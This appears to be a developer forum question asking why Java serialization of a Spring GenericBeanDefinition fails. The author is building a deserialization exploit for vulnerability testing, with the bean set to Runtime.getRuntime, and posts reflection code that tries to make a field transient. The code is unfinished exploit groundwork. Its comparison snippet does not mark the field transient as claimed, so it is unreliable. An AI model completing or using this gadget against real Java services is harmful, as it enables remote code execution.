Wednesday 20 November 2019

Serialization of Spring's AbstractBeanDefinition with the help of reflection

To test vulnerabilities in our system I want to create an exploit which needs to serialize GenericBeanDefinition from spring-beans.

The superclass AbstractBeanDefinition has one attribute which is not serializable: constructorArgumentValues.

To hack around this, I wrote the following code to mark the attribute as transient via reflection:

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import org.springframework.beans.factory.support.AbstractBeanDefinition;
import org.springframework.beans.factory.support.GenericBeanDefinition;

public class SerializeBeanDefinition {
    public static void main(String[] args) {
        // create a bean object
        GenericBeanDefinition bean = new GenericBeanDefinition();
        bean.setBeanClass(Runtime.class);
        bean.setFactoryMethodName("getRuntime");

        // make constructorArgumentValues transient via reflection
        try {
            Field field = AbstractBeanDefinition.class.getDeclaredField("constructorArgumentValues");
            Field modifiers = Field.class.getDeclaredField("modifiers");
            modifiers.setAccessible(true);
            modifiers.setInt(field, field.getModifiers() | Modifier.TRANSIENT);

            field.setAccessible(true);
            field.set(bean, null);
        } catch (Exception e) {
            e.printStackTrace();
        }

        // serialize it
        try (FileOutputStream fileOut = new FileOutputStream("test.ser");
             ObjectOutputStream outStream = new ObjectOutputStream(fileOut)) {
            outStream.writeObject(bean);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Unfortunately I get:

java.io.NotSerializableException: org.springframework.beans.factory.config.ConstructorArgumentValues

The snippet above works fine when I try it with another simple class:

import java.io.Serializable;

class MySerializable implements Serializable {
    // field of a non-serializable type, made transient via the same reflection trick
    private MyUnserializable myUnserializable = new MyUnserializable();
}

class MyUnserializable {
}

I don't see the problem here. Thanks for any help!
